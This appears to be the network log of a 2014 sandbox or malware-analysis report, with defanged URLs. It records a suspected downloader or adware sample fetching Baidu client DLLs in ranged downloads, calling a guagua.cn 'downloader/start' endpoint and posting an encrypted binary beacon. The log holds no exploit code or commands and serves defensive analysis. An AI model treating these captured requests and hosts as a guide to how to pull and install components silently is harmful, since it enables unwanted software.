Host: cnzz.mmstat.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Server: Tengine<br>
Date: Sun, 17 Aug 2014 02:21:26 GMT<br>
Content-Type: image/gif<br>
Content-Length: 43<br>
Connection: keep-alive<br>
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"<br>
Set-Cookie: cna=pv92DG xUBsCAcGK9OdTDULL; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.mmstat.com<br>
Set-Cookie: sca=c4e7e74b; path=/; domain=.cnzz.mmstat.com<br>
Set-Cookie: atpsida=a967ae7461eeb242201dd034_1408242086; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.cnzz.mmstat.com<br>
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL<br>
Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>
Cache-Control: no-cache<br>
Pragma: no-cache<br><pre>GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:<br> Tengine..Date: Sun, 17 Aug 2014 02:21:26 GMT..Content-Type: image/gif<br>..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR<br>a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=pv92DG xUB<br>sCAcGK9OdTDULL; expires=Wed, 14-Aug-24 02:21:26 GMT; path=/; domain=.m<br>mstat.com..Set-Cookie: sca=c4e7e74b; path=/; domain=.cnzz.mmstat.com..<br>Set-Cookie: atpsida=a967ae7461eeb242201dd034_1408242086; expires=Wed, <br>14-Aug-24 02:21:26 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt<br>p://pcookie.cnzz.com/app.gif?&cna=pv92DG xUBsCAcGK9OdTDULL..Expires: T<br>hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach<br>e..GIF89a.............!.......,...........L..;..</pre></font><br><br
<font color="red">GET /tg_pic/1.png HTTP/1.1<br>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:32 GMT<br>
Content-Type: image/png<br>
Content-Length: 135179<br>
Last-Modified: Mon, 23 Dec 2013 03:08:13 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:34 GMT<br>
Content-Type: image/png<br>
Content-Length: 160224<br>
Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:36 GMT<br>
Content-Type: image/png<br>
Content-Length: 149164<br>
Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:38 GMT<br>
Content-Type: image/png<br>
Content-Length: 156314<br>
Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:40 GMT<br>
Content-Type: image/png<br>
Content-Length: 164337<br>
Last-Modified: Mon, 23 Dec 2013 03:08:12 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: img001.com<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:25:41 GMT<br>
Content-Type: image/png<br>
Content-Length: 132296<br>
Last-Modified: Mon, 06 Jan 2014 08:23:44 GMT<br>
Connection: keep-alive<br>
<<< skipped >>>
<font color="red">GET /client/dllv3/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=753664-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 16:01:04 GMT<br>
Date: Sun, 10 Aug 2014 16:01:04 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Mon, 17 Jun 2013 13:07:38 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 753664-1207519/1207520<br>
Content-Length: 453856<br>
Age: 555567<br>
Via: 1.0 sdytwt88:88 (Cdn Cache Server V2.0), 1.0 tswt76:8104 (Cdn Cache Server V2.0), 1.0 jg13:10003 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=1081344-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>
Date: Sun, 03 Aug 2014 13:53:19 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 1081344-1207519/1207520<br>
Content-Length: 126176<br>
Age: 1168032<br>
Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=622592-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>
Date: Sun, 10 Aug 2014 15:52:20 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 622592-924495/924496<br>
Content-Length: 301904<br>
Age: 556088<br>
Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /support/mini/fyminiloader-min.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://tv.aiqingzhihui.com/zhibo2.html?id=pczh_107_306.exe&en=2014-8-17&go=<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: static.m0dlcdn.kukuplay.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: application/x-javascript<br>
Last-Modified: Fri, 11 Jan 2013 07:55:33 GMT<br>
Expires: Thu, 31 Dec 2037 23:55:55 GMT<br>
Cache-Control: max-age=315360000<br>
Content-Encoding: gzip<br>
X-Via-Cache: sx<br>
Content-Length: 363<br>
Accept-Ranges: bytes<br>
Date: Sun, 17 Aug 2014 02:21:50 GMT<br>
X-Varnish: 697734456 662675323<br>
Age: 3427941<br>
Via: 1.1 varnish<br>
Connection: keep-alive<br>
X-cdn: sxcdn<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=6553600-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:40 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 19450704<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127201<br>
Content-Range: bytes 6553600-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/common/patch/19562458020/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=720896-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:29 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 203600<br>
Connection: close<br>
ETag: 44edff85d12e091f0b129f05a3f2a042<br>
Last-Modified: Tue, 06 May 2014 07:48:08 GMT<br>
Expires: Mon, 18 Aug 2014 14:59:49 GMT<br>
Age: 127240<br>
Content-Range: bytes 720896-924495/924496<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: 45FD47DB9BA063A62A2F1AF299C66DD6<br>
x-bs-request-id: MTAuNDYuMTU3LjIzOjgwODA6MTU1MDU3MDk3NDoyOC9KdWwvMjAxNCAyMjo1ODo0MyA=<br>
x-bs-meta-crc32: 3569711378<br>
Content-MD5: 44edff85d12e091f0b129f05a3f2a042<br>
x-bs-client-ip: MTgwLjc2LjIyLjc1<br><pre>......................................................................<br>......................................................................<br>......................................................................<br>...... !"#$%&'()* ,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxy<br>z[\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................<br>......................................................................<br>......................................................................<br>...........................................</pre></font><br><br
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=131072-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:41 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 25873232<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127202<br>
Content-Range: bytes 131072-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=458752-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>
Date: Sun, 10 Aug 2014 15:52:20 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 458752-924495/924496<br>
Content-Length: 465744<br>
Age: 556088<br>
Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">POST / HTTP/1.1<br>
Connection: Keep-Alive<br>
Content-Length: 228<br>
Content-Type: application/octet-stream<br>
Host: s.x.baidu.com<br>
Keep-Alive: timeout=600,max=1000<br>
<br>
...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:....59......\....3V.%..5..2.c..`.E=~.8.@.H.P.X.` ...h.%h...C}.K{T\QZa.L.`. .P!..~...L.<..Vs..d."..v.<<..|'.f..>>..*E...........2........."S..,...N.$"....K....2</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: iYuntianSvr<br>
Content-Type: application/octet-stream<br>
Keep-Alive: timeout=30<br>
Connection: Keep-Alive<br>
Content-Length: 140<br><pre>...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:.<br>...59......\....3V.%..5..2.c..`.E=~.8.@.H.P.X.` .....%W............P.g<br>HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-<br>stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length<br>: 140.....p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.<br>Cj...:....59......\....3V.%..5..2.c..`.E=~.8.@.H.P.X.` .....%W........<br>....P.g..</pre></font><br><br
<font color="red">GET /client/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=983040-<br>
Referer: hXXp://xf.baidu.com<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 16:02:45 GMT<br>
Date: Sun, 10 Aug 2014 16:02:45 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 15 May 2013 01:54:31 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 983040-1207519/1207520<br>
Content-Length: 224480<br>
Age: 555466<br>
Via: 1.0 fjqz153:8080 (Cdn Cache Server V2.0), 1.0 sdbz73:8104 (Cdn Cache Server V2.0), 1.0 shiben10:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=458752-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:41 GMT<br>
Date: Sun, 10 Aug 2014 15:52:41 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 458752-1207519/1207520<br>
Content-Length: 748768<br>
Age: 556070<br>
Via: 1.0 sdytwt85:88 (Cdn Cache Server V2.0), 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 shiben14:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=458752-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>
Date: Sun, 10 Aug 2014 15:52:24 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 458752-1178447/1178448<br>
Content-Length: 719696<br>
Age: 556090<br>
Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMNet.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=13107200-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:20:40 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 12897104<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127201<br>
Content-Range: bytes 13107200-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Range: bytes=622592-<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>
Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>
Date: Sun, 03 Aug 2014 13:53:19 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Content-Range: bytes 622592-1207519/1207520<br>
Content-Length: 584928<br>
Age: 1168032<br>
Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 200 OK<br>
Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>
Date: Sun, 03 Aug 2014 13:53:19 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Content-Length: 1207520<br>
Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Age: 1168031<br>
Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDMReport.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= HTTP/1.1<br>
Accept: */*<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>
Host: cj.guagua.cn<br>
Cache-Control: no-cache<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sun, 17 Aug 2014 02:20:39 GMT<br>
Content-Length: 0<br>
Connection: keep-alive<br>
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br><pre>HTTP/1.1 200 OK..Server: nginx..Date: Sun, 17 Aug 2014 02:20:39 GMT..C<br>ontent-Length: 0..Connection: keep-alive..P3P: CP="CURa ADMa DEVa PSAo<br> PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..</pre></font><br><br
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=22675456-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:22 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 3328848<br>
Connection: close<br>
ETag: c7062e404128917808756500d58121ee<br>
Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>
Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>
Age: 127243<br>
Content-Range: bytes 22675456-26004303/26004304<br>
Access-Control-Allow-Origin: *<br>
Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>
Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>
Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>
Accept-Ranges: bytes<br>
x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>
x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>
x-bs-meta-crc32: 2839405489<br>
Content-MD5: c7062e404128917808756500d58121ee<br>
<<< skipped >>>
<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dl1sw.baidu.com<br>
Referer: hXXp://dl1sw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.0 200 OK<br>
Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>
Date: Sun, 10 Aug 2014 15:52:20 GMT<br>
Server: nginx<br>
Content-Type: application/octet-stream<br>
Content-Length: 924496<br>
Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>
Cache-Control: max-age=2592000<br>
Accept-Ranges: bytes<br>
Age: 556087<br>
Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>
Connection: close<br>
Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>
Access-Control-Allow-Origin: *<br>
<<< skipped >>>
<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>
Accept: */*<br>
Accept-Language: zh-CN,zh,en-US<br>
Connection: Keep-Alive<br>
Host: dlsw.baidu.com<br>
Range: bytes=21102592-<br>
Referer: hXXp://dlsw.baidu.com/<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
<br>
</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>
Server: JSP3/2.0.0-b<br>
Date: Sun, 17 Aug 2014 02:21:11 GMT<br>
Content-Type: application/x-msdownload<br>
Content-Length: 4901712<br>
